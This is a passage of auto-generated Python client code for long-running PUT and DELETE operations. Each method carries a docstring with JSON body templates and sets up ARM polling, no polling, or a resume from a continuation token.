polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put201_creating_failed200(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request, service returns a 201 to the initial request, with an entity that
contains ProvisioningState=’Created’. Polls return this value until the last poll returns a
‘200’ with ProvisioningState=’Failed’.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200, 201
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put201_creating_failed200_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put200_acceptedcanceled200(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request, service returns a 201 to the initial request, with an entity that
contains ProvisioningState=’Creating’. Polls return this value until the last poll returns a
‘200’ with ProvisioningState=’Canceled’.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put200_acceptedcanceled200_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_no_header_in_retry(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request, service returns a 202 to the initial request with location header.
Subsequent calls to operation status do not contain location header.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 202
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put_no_header_in_retry_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_async_retry_succeeded(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request, service returns a 200 to the initial request, with an entity that
contains ProvisioningState=’Creating’. Poll the endpoint indicated in the Azure-AsyncOperation
header for operation status.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put_async_retry_succeeded_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_async_no_retry_succeeded(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request, service returns a 200 to the initial request, with an entity that
contains ProvisioningState=’Creating’. Poll the endpoint indicated in the Azure-AsyncOperation
header for operation status.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put_async_no_retry_succeeded_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_async_retry_failed(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request, service returns a 200 to the initial request, with an entity that
contains ProvisioningState=’Creating’. Poll the endpoint indicated in the Azure-AsyncOperation
header for operation status.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put_async_retry_failed_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_async_no_retrycanceled(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request, service returns a 200 to the initial request, with an entity that
contains ProvisioningState=’Creating’. Poll the endpoint indicated in the Azure-AsyncOperation
header for operation status.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put_async_no_retrycanceled_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_async_no_header_in_retry(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request, service returns a 202 to the initial request with
Azure-AsyncOperation header. Subsequent calls to operation status do not contain
Azure-AsyncOperation header.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 201
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put_async_no_header_in_retry_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_non_resource(self, sku: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request with non resource.
:param sku: sku to put.
:type sku: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
sku = {
"id": "str", # Optional.
"name": "str" # Optional.
}
# response body for status code(s): 202
response.json() == {
"id": "str", # Optional.
"name": "str" # Optional.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put_non_resource_initial(
sku=sku, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_async_non_resource(self, sku: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request with non resource.
:param sku: Sku to put.
:type sku: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
sku = {
"id": "str", # Optional.
"name": "str" # Optional.
}
# response body for status code(s): 202
response.json() == {
"id": "str", # Optional.
"name": "str" # Optional.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put_async_non_resource_initial(
sku=sku, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_sub_resource(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request with sub resource.
:param product: Sub Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Sub Resource Id.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
}
}
# response body for status code(s): 202
response.json() == {
"id": "str", # Optional. Sub Resource Id.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
}
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put_sub_resource_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_async_sub_resource(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request with sub resource.
:param product: Sub Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Sub Resource Id.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
}
}
# response body for status code(s): 202
response.json() == {
"id": "str", # Optional. Sub Resource Id.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
}
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put_async_sub_resource_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_provisioning202_accepted200_succeeded(self, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running delete request, service returns a 202 to the initial request, with an entity that
contains ProvisioningState=’Accepted’. Polls return this value until the last poll returns a
‘200’ with ProvisioningState=’Succeeded’.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# response body for status code(s): 200, 202
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
